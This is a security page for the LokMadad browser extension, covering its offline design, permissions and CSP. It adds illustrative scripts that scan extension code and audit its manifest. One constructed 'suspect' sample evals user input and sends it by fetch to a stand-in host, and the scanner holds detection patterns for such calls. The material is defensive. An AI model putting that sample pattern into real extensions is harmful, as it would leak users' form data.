
Security

Last Updated: January 30, 2026 • Version 1.2.0

Security by Design: LokMadad is architected with security as a core principle. By operating 100% offline, we eliminate the most common attack vectors: network interception, server breaches, and data leaks.

1. Security Architecture Overview

LokMadad employs a "security through simplicity" approach. By minimizing our attack surface, we maximize your protection.

  • 100% Offline: No network requests means no data interception, no man-in-the-middle attacks, and no server-side vulnerabilities.
  • Local Storage Only: All data stays in Chrome's encrypted local storage, protected by your browser's built-in security.
  • No External Dependencies: Zero third-party libraries, APIs, or services that could introduce vulnerabilities.
  • Minimal Permissions: We request only the permissions absolutely necessary for form validation.

2. Data Protection

2.1 No Data Transmission

LokMadad makes zero network requests. This is verifiable:

  • Open Chrome DevTools → Network tab while using the extension
  • You will see no requests originating from LokMadad
  • Our manifest.json contains no remote hosts in permissions

2.2 Local Storage Security

When you save profile data:

  • Data is stored using chrome.storage.local
  • Chrome encrypts this storage on disk
  • Data is isolated and accessible only to LokMadad
  • Other extensions cannot access your saved data
  • Websites cannot access extension storage

2.3 Sensitive Data Handling

Important: Your Aadhaar, PAN, and other sensitive data is ONLY processed in memory during validation. It is never logged, cached (except in local storage if you explicitly save it), or transmitted anywhere.

3. Secure Coding Practices

Our codebase follows industry-standard security practices:

| Practice | Implementation |
|---|---|
| Content Security Policy | Strict CSP in manifest.json prevents injection attacks |
| No eval() | We never use eval(), new Function(), or similar dynamic code execution |
| Input Sanitization | All user inputs are sanitized before processing to prevent XSS |
| No Inline Scripts | All JavaScript is in separate files, no inline event handlers |
| Principle of Least Privilege | Extension requests minimal necessary permissions |
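
A static check for the practices in the table above and the no-network claim in 2.1, added here as an example and not part of LokMadad's code base. The rule names, scanFiles and both sample file sets are constructed for illustration.

```javascript
// Added example: static scan of an unpacked extension's files for the
// constructs this page says are absent. Regex matching is a heuristic: it can
// miss obfuscated code and can flag text inside strings or comments.
const JS_RULES = [
  ["dynamic-code", /\beval\s*\(|\bnew\s+Function\s*\(/],
  ["network-api", /\bfetch\s*\(|\bXMLHttpRequest\b|\bWebSocket\b|\bEventSource\b|\bsendBeacon\s*\(/],
];
const HTML_RULES = [
  ["inline-handler", /<[^>]+\son[a-z]+\s*=/i],
  ["inline-script", /<script(?![^>]*\bsrc\s*=)[^>]*>/i],
  ["remote-script", /<script[^>]*\bsrc\s*=\s*["']?(?:https?:)?\/\//i],
];

// files: { "path": "file contents" }; returns [{ file, line, rule }].
function scanFiles(files) {
  const hits = [];
  for (const [file, text] of Object.entries(files)) {
    const rules = file.endsWith(".html") ? HTML_RULES
      : file.endsWith(".js") ? JS_RULES : [];
    text.split("\n").forEach((src, i) => {
      for (const [rule, re] of rules) {
        if (re.test(src)) hits.push({ file, line: i + 1, rule });
      }
    });
  }
  return hits;
}

// Constructed sample files, not LokMadad's source.
const CLEAN = {
  "popup.html": '<button id="save">Save</button>\n<script src="popup.js"></script>',
  "popup.js": 'document.getElementById("save").addEventListener("click", save);\n'
    + "function save() { chrome.storage.local.set({ saved: true }); }",
};
const SUSPECT = {
  "popup.html": '<button onclick="save()">Save</button>\n<script>save()</script>',
  "content.js": 'const v = eval(input.value);\nfetch("https://example.invalid/", { body: v });',
};

console.log(scanFiles(CLEAN));   // no hits expected
console.log(scanFiles(SUSPECT)); // one hit per rule that fires
```

A clean scan complements the DevTools check in 7.1 but does not replace it, since pattern matching only sees what is written literally in the source.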

4. Extension Permissions Explained

Transparency about what we access and why:

storage

Purpose: Save your settings and optional profile data locally

Access Level: Extension-only, isolated from websites and other extensions

Risk: Minimal — data stays on your device

host_permissions: <all_urls>

Purpose: Detect and validate form fields on any website you visit

Access Level: Can read DOM elements on pages to find form fields

Risk: We only read form field attributes (name, type, value) for validation. We do NOT read page content, cookies, or any other data.

5. Content Security Policy

Our manifest.json enforces a strict Content Security Policy:

"content_security_policy": {
  "extension_pages": "script-src 'self'; object-src 'self'"
}

This policy:

  • Only allows scripts from within the extension package
  • Blocks inline JavaScript execution
  • Prevents loading external scripts
  • Mitigates XSS and code injection attacks

6. What We Don't Do

LokMadad is designed with intentional limitations for your security:

  • We don't track your browsing activity
  • We don't log form submissions
  • We don't capture screenshots or keystrokes
  • We don't inject ads or affiliate links
  • We don't sell or share any data (we have none)
  • We don't connect to any remote servers
  • We don't auto-update content from external sources

7. Verification

Don't take our word for it — you can verify our security claims:

7.1 Network Activity

  1. Install LokMadad
  2. Open Chrome DevTools (F12) → Network tab
  3. Use the extension on various websites
  4. Filter by "lokmadad" or check all requests
  5. Verify: Zero outgoing requests from the extension

7.2 Permission Audit

  1. Go to chrome://extensions
  2. Click "Details" on LokMadad
  3. Review "Site access" and "Permissions"
  4. Verify we only request minimal permissions
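
A scripted version of the permission audit above and of the CSP check in section 5, added here as an example (not LokMadad's own code). SAMPLE_MANIFEST is constructed from the values quoted on this page, and the function and constant names are hypothetical; in practice the input would be the manifest.json read from the unpacked extension directory.

```javascript
// Added example: audits a Manifest V3 manifest against the values this page states.
// SAMPLE_MANIFEST is constructed from the page; it is not the real manifest.json.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  permissions: ["storage"],
  host_permissions: ["<all_urls>"],
  content_security_policy: {
    extension_pages: "script-src 'self'; object-src 'self'",
  },
};
const EXPECTED_PERMISSIONS = new Set(["storage"]);
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// Parse a CSP string into { directive: [source, ...] }.
function parseCsp(csp) {
  const out = {};
  for (const part of csp.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) out[name.toLowerCase()] = sources;
  }
  return out;
}

// Returns a list of human-readable findings; an empty list means nothing to review.
function auditManifest(m) {
  const findings = [];
  if (m.manifest_version !== 3) findings.push("not Manifest V3");
  for (const p of m.permissions || []) {
    if (!EXPECTED_PERMISSIONS.has(p)) findings.push(`unexpected permission: ${p}`);
  }
  for (const h of m.host_permissions || []) {
    if (BROAD_HOSTS.has(h)) findings.push(`broad host access: ${h}`);
  }
  const policy = (m.content_security_policy || {}).extension_pages;
  if (!policy) {
    findings.push("no explicit extension_pages CSP");
  } else {
    const csp = parseCsp(policy);
    for (const d of ["script-src", "object-src"]) {
      if (!csp[d]) { findings.push(`${d} not set`); continue; }
      const extra = csp[d].filter((s) => s !== "'self'" && s !== "'none'");
      if (extra.length) findings.push(`${d} allows sources beyond 'self': ${extra.join(" ")}`);
    }
  }
  if (m.externally_connectable) findings.push("externally_connectable is set");
  return findings;
}

console.log(auditManifest(SAMPLE_MANIFEST));
```

For the sample manifest the only finding is the `<all_urls>` host pattern, which is the access described in section 4 and the item to weigh when reviewing "Site access".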

8. Security Updates

We are committed to maintaining a secure extension:

  • Regular code reviews for potential vulnerabilities
  • Prompt updates if security issues are discovered
  • Following Chrome's Manifest V3 security guidelines

9. Reporting Security Issues

If you discover a security vulnerability, please report it responsibly:

📧 lokmaddad@gmail.com

Please include:

  • Description of the vulnerability
  • Steps to reproduce
  • Potential impact
  • Your suggested fix (if any)

We take all security reports seriously and will respond promptly.

10. Third-Party Website Security

Disclaimer: While LokMadad helps you fill forms securely, we cannot guarantee the security of the websites you visit. Always verify you're on legitimate websites before entering sensitive information.

LokMadad does not validate or vouch for the security of any third-party website. We recommend:

  • Checking for HTTPS (padlock icon) before entering data
  • Verifying website authenticity through official channels
  • Being cautious of phishing attempts

Security Summary: LokMadad is designed from the ground up with security in mind. By operating offline with minimal permissions and following strict coding practices, we ensure your sensitive data remains protected and under your control.

© 2026 LokMadad. Made with ❤️ in India.